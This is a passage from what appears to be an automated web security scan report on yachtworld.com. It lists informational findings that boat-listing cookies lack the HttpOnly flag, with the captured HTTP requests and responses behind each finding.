VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:20:03 GMT
VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; s_pers=%20s_nr%3D1296155975932%7C1298747975932%3B%20s_lv%3D1296155975933%7C1390763975933%3B%20s_lv_s%3DFirst%2520Visit%7C1296157775933%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.4.10.1296155952; VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:20:03 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 19 Jan 2011 16:33:04 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:20:03 GMT
Set-Cookie: VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 30713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.62. http://www.yachtworld.com/boats/2007/Regulator-Center-Console-2030806/VA/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2007/Regulator-Center-Console-2030806/VA/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2030806%5B%25%5D32%27+Regulator+Center+console%5B%25%5DUSD%26nbsp%3B159%2C500%5B%25%5DVA%2C+United+States%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F0%2F3%2F0%2F8%2F2030806_9_mini.jpg%3F1281995171000%5B%25%5D%2Fboats%2F2007%2FRegulator-Center-console-2030806%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:49 GMT
VIEWED_BOATS_STORE=2030806%5B%25%5D32%27+Regulator+Center+console%5B%25%5DUSD%26nbsp%3B159%2C500%5B%25%5DVA%2C+United+States%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F0%2F3%2F0%2F8%2F2030806_9_mini.jpg%3F1281995171000%5B%25%5D%2Fboats%2F2007%2FRegulator-Center-console-2030806%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2007/Regulator-Center-Console-2030806/VA/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:49 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 07 Sep 2010 20:17:05 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2030806%5B%25%5D32%27+Regulator+Center+console%5B%25%5DUSD%26nbsp%3B159%2C500%5B%25%5DVA%2C+United+States%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F0%2F3%2F0%2F8%2F2030806_9_mini.jpg%3F1281995171000%5B%25%5D%2Fboats%2F2007%2FRegulator-Center-console-2030806%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:49 GMT
Set-Cookie: VIEWED_BOATS_STORE=2030806%5B%25%5D32%27+Regulator+Center+console%5B%25%5DUSD%26nbsp%3B159%2C500%5B%25%5DVA%2C+United+States%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F0%2F3%2F0%2F8%2F2030806_9_mini.jpg%3F1281995171000%5B%25%5D%2Fboats%2F2007%2FRegulator-Center-console-2030806%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.63. http://www.yachtworld.com/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2250145%5B%25%5D32%27+Regulator+32+Classic%5B%25%5DUSD%26nbsp%3B159%2C900%5B%25%5DBabylon%2C+NY%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F0%2F1%2F2250145_1_mini.jpg%3F1282409230000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-Classic-2250145%2FBabylon%2FNY%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:49 GMT
VIEWED_BOATS_STORE=2250145%5B%25%5D32%27+Regulator+32+Classic%5B%25%5DUSD%26nbsp%3B159%2C900%5B%25%5DBabylon%2C+NY%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F0%2F1%2F2250145_1_mini.jpg%3F1282409230000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-Classic-2250145%2FBabylon%2FNY%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; 